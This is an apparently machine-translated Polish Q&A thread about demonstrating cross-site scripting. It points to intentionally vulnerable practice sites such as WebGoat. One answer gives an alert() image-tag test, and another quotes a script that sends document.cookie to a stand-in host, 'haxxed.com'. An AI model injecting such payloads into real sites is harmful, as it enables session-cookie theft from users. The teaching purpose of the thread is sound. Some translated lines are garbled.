Czy ktoś może mi pokazać atak Cross-site scripting w mojej przeglądarce? Czy istnieje przykład w Internecie, który to robi? Nie znalazłem tego w Internecie.Prosty przykład ataku typu Cross-site scripting
Im prostszy przykład, tym lepiej.
Zobacz http://www.insecurelabs.org i http://www.insecurelabs.org/task/
Celowo podatny na XSS w polu wyszukiwania i kilku innych miejscach.
Zazwyczaj będziesz musiał zainstalować własne oprogramowanie po stronie serwera dla przykładu XSS na żywo. Niewiele legalnych witryn będzie celowo otwierać lukę XSS dla internautów.
Jednym z gotowych programów po stronie serwera, które pozwalają zademonstrować XSS (wśród wielu innych rzeczy) jest WebGoat OWASP. Oto instructions to install WebGoat and demonstrate XSS. Znajdziesz dodatkowe przykłady fragmentów programów, które umożliwiają XSS w artykule OWASP "Cross-site scripting (XSS)".
<img src="javascript:alert('hello everybody')"></img> Zmontowany znacznik obrazu jest przykładem xss. powyższy src zawiera skrypt ostrzegawczy java.
To nic nie robi !? –
Prosty formularz będzie również: Jeśli pojawi się okno komunikatu, wiesz, że strona lub serwer jest podatny na ataki.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Wielki próbka jak działa technika można znaleźć tutaj https://www.hacksplaining.com/exercises/xss-stored
Rodzaj w poszukiwaniu i ostrzega mnie –
Tak, ale chodzi o to, aby nie ujawniać wszystkich tutaj błędy. I na pewno jest coś więcej. – Erlend